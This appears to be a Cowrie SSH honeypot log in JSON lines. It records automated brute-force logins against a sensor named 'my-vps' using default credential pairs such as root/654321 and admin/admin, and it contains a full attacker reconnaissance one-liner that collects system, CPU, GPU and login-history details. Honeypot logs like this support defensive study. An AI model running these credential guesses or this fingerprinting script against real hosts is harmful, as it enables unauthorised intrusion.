{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:03:30.557333Z","src_ip":"83.168.105.65","session":"c7de78df7143"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:03:30.558588Z","src_ip":"83.168.105.65","session":"c7de78df7143"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51654,"dst_ip":"1.2.3.4","dst_port":22,"session":"80df36bf2693","protocol":"ssh","message":"New connection: 212.227.235.229:51654 (1.2.3.4:22) [session: 80df36bf2693]","sensor":"my-vps","timestamp":"2025-08-26T12:03:36.309008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:03:36.846857Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:03:36.848092Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.login.success","username":"root","password":"654321","message":"login attempt [root/654321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:03:38.520385Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:03:39.795599Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.796282Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.796900Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.798124Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.799420Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.800049Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.800834Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.802101Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.802563Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.803188Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.803676Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.804312Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:03:39.804864Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T12:03:40.177770Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:03:40.178837Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:03:40.179866Z","src_ip":"212.227.235.229","session":"80df36bf2693"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":42200,"dst_ip":"1.2.3.4","dst_port":22,"session":"165b299661d5","protocol":"ssh","message":"New connection: 83.168.105.65:42200 (1.2.3.4:22) [session: 165b299661d5]","sensor":"my-vps","timestamp":"2025-08-26T12:03:45.294928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:03:45.297807Z","src_ip":"83.168.105.65","session":"165b299661d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:03:45.331611Z","src_ip":"83.168.105.65","session":"165b299661d5"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:03:45.475872Z","src_ip":"83.168.105.65","session":"165b299661d5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:03:46.515130Z","src_ip":"83.168.105.65","session":"165b299661d5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38542,"dst_ip":"1.2.3.4","dst_port":22,"session":"dadec6f56d6b","protocol":"ssh","message":"New connection: 196.251.86.249:38542 (1.2.3.4:22) [session: dadec6f56d6b]","sensor":"my-vps","timestamp":"2025-08-26T12:03:58.199340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:03:58.811221Z","src_ip":"196.251.86.249","session":"dadec6f56d6b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:03:58.812041Z","src_ip":"196.251.86.249","session":"dadec6f56d6b"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41662,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd43f404330","protocol":"ssh","message":"New connection: 83.168.105.65:41662 (1.2.3.4:22) [session: 9cd43f404330]","sensor":"my-vps","timestamp":"2025-08-26T12:04:00.381509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:04:00.382408Z","src_ip":"83.168.105.65","session":"9cd43f404330"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:04:00.422918Z","src_ip":"83.168.105.65","session":"9cd43f404330"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-26T12:04:00.546552Z","src_ip":"83.168.105.65","session":"9cd43f404330"}
{"eventid":"cowrie.login.failed","username":"git","password":"q1w2e3r4","message":"login attempt [git/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-08-26T12:04:01.062029Z","src_ip":"196.251.86.249","session":"dadec6f56d6b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:04:01.589215Z","src_ip":"83.168.105.65","session":"9cd43f404330"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:04:02.625136Z","src_ip":"196.251.86.249","session":"dadec6f56d6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43284,"dst_ip":"1.2.3.4","dst_port":22,"session":"5567060807f7","protocol":"ssh","message":"New connection: 212.227.235.229:43284 (1.2.3.4:22) [session: 5567060807f7]","sensor":"my-vps","timestamp":"2025-08-26T12:04:11.450896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:04:11.876714Z","src_ip":"212.227.235.229","session":"5567060807f7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:04:11.877363Z","src_ip":"212.227.235.229","session":"5567060807f7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T12:04:13.518643Z","src_ip":"212.227.235.229","session":"5567060807f7"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:04:14.849639Z","src_ip":"212.227.235.229","session":"5567060807f7"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56006,"dst_ip":"1.2.3.4","dst_port":22,"session":"d70a0422a081","protocol":"ssh","message":"New connection: 83.168.105.65:56006 (1.2.3.4:22) [session: d70a0422a081]","sensor":"my-vps","timestamp":"2025-08-26T12:04:15.666252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:04:15.667220Z","src_ip":"83.168.105.65","session":"d70a0422a081"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:04:15.703195Z","src_ip":"83.168.105.65","session":"d70a0422a081"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:04:15.813150Z","src_ip":"83.168.105.65","session":"d70a0422a081"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:04:16.852562Z","src_ip":"83.168.105.65","session":"d70a0422a081"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":54808,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfb8f74d642e","protocol":"ssh","message":"New connection: 45.88.8.186:54808 (1.2.3.4:22) [session: cfb8f74d642e]","sensor":"my-vps","timestamp":"2025-08-26T12:04:22.692837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:04:23.426618Z","src_ip":"45.88.8.186","session":"cfb8f74d642e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:04:23.427509Z","src_ip":"45.88.8.186","session":"cfb8f74d642e"}
{"eventid":"cowrie.login.success","username":"root","password":"123@qwe","message":"login attempt [root/123@qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:04:26.897506Z","src_ip":"45.88.8.186","session":"cfb8f74d642e"}
